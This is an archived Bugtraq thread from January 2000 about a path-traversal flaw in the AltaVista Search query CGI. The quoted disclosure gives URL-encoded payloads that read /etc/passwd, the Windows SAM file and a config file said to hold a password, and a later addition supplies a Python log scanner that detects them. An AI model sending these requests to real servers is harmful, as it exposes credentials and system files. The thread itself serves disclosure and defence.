[13309] in bugtraq
Re: Altavista followup
daemon@ATHENA.MIT.EDU (Roelandts, Guy)
Tue Jan 11 11:53:49 2000
Message-Id: <6B180991CB19D31183E40000F86AF80E56DB76@broexc2.bro.dec.com>
Date: Tue, 11 Jan 2000 07:54:38 -0000
Reply-To: "Roelandts, Guy" <Guy.Roelandts@COMPAQ.COM>
From: "Roelandts, Guy" <Guy.Roelandts@COMPAQ.COM>
X-To: BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM

Hi Rudi,

Just tried to reproduce the bugs you were talking about, and I can
confirm that they exist without their secpatch and that they are gone
after having installed the secpatch.

Guy ROELANDTS
Compaq EMEA

> -----Original Message-----
> From: rudi carell [mailto:rudicarell@HOTMAIL.COM]
> Sent: Sunday, January 09, 2000 4:37 PM
> To: BUGTRAQ@SECURITYFOCUS.COM
> Subject: Altavista followup
>
>
> hola,
>
> more bugs in the AV-Search thing ..
>
> using uri-encoded strings it is possible to view "any" file
> on the system ..
>
> examples:
>
> unixxxsss ...
>
> http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd
>
> or on an micro$oft IIS ...
>
> http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2f%2e%2e%2f\\winnt\\repair\\sam._
>
> interesting infos about the file structure ...
>
> http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2findex/intranet/indexer.log
>
> or another file which does contain the password ..
>
> http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2findex/intranet/policy.conf
>
> altavista told me that this is(was) just a flavour of the "old" bug and its
> fix is(was) included in the last secpatch.
>
> whatever ....
>
> nicedays :-/
>
> RC
> rudicarell@hotmail.com
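
A log check for the request pattern reported in this thread, as an added example that is not part of the original messages or of any vendor code: it percent-decodes the `mss` parameter until the value is stable and flags parent-directory segments or absolute paths. The request lines are constructed (the flagged ones reuse the query strings quoted above, the benign values are hypothetical), and it assumes a legitimate `mss` value is a plain relative name.

```python
import re
from urllib.parse import urlsplit, unquote

PARAM = "mss"      # query parameter named in the post
MAX_ROUNDS = 5     # bound on repeated percent-decoding

# Constructed request lines: the benign values are hypothetical, the
# others reuse the query strings quoted in the post.
SAMPLE_LOG = [
    "GET /cgi-bin/query?mss=search&q=firewall HTTP/1.0",
    "GET /cgi-bin/query?q=%2e%2e+in+a+search+term&mss=simple HTTP/1.0",
    "GET /cgi-bin/query?mss=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd HTTP/1.0",
    r"GET /cgi-bin/query?mss=%2e%2e%2f%2e%2e%2f%2e%2e%2f\\winnt\\repair\\sam._ HTTP/1.0",
    "GET /cgi-bin/query?mss=%2e%2e%2f%2e%2e%2findex/intranet/indexer.log HTTP/1.0",
    "GET /cgi-bin/query?mss=%2e%2e%2f%2e%2e%2findex/intranet/policy.conf HTTP/1.0",
]

def fully_decode(value):
    """Percent-decode until the value stops changing, so nested encoding is not missed."""
    for _ in range(MAX_ROUNDS):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def traversal_reason(request_line):
    """Return why the mss value looks like path traversal, or None if it does not."""
    parts = request_line.split()
    if len(parts) < 2:
        return None
    for pair in urlsplit(parts[1]).query.split("&"):
        name, _, raw = pair.partition("=")
        if unquote(name) != PARAM:
            continue
        path = fully_decode(raw).replace("\\", "/")   # treat both separators alike
        if ".." in path.split("/"):
            return "parent-directory segment: " + path
        if path.startswith("/") or re.match(r"[A-Za-z]:", path):
            return "absolute path: " + path
    return None

def scan(lines):
    """Return (line, reason) for every request line that should be reviewed."""
    return [(line, why) for line in lines if (why := traversal_reason(line))]

if __name__ == "__main__":
    for line, why in scan(SAMPLE_LOG):
        print(why, "<-", line)
```

Only the `mss` value is inspected, so dots inside an ordinary search term (the second sample line) are not reported.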